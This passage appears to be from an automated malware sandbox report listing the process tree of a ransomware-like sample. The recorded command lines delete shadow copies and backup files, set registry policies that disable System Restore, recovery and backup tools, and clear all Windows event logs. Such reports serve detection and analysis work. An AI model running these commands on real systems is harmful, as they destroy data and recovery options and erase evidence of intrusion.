C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet2⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del %02⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s hrmlog22⤵
-
C:\Windows\system32\attrib.exeattrib +h +s hrmlog23⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog22⤵
-
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\hrmlog23⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe el3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe el4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Analytic"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Application"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DebugChannel"3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowFilterGraph"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowPluginControl"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Els_Hyphenation/Analytic"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "EndpointMapper"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "ForwardedEvents"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "HardwareEvents"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Internet Explorer"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Key Management Service"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MF_MediaFoundationDeviceProxy"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Media Center"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationDeviceProxy"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPerformance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPipeline"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPlatform"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IE/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ADSI/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/General"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppID/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Performance"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audit/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Backup"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CDROM/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Calculator/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Logging"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXP/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"3⤵
-
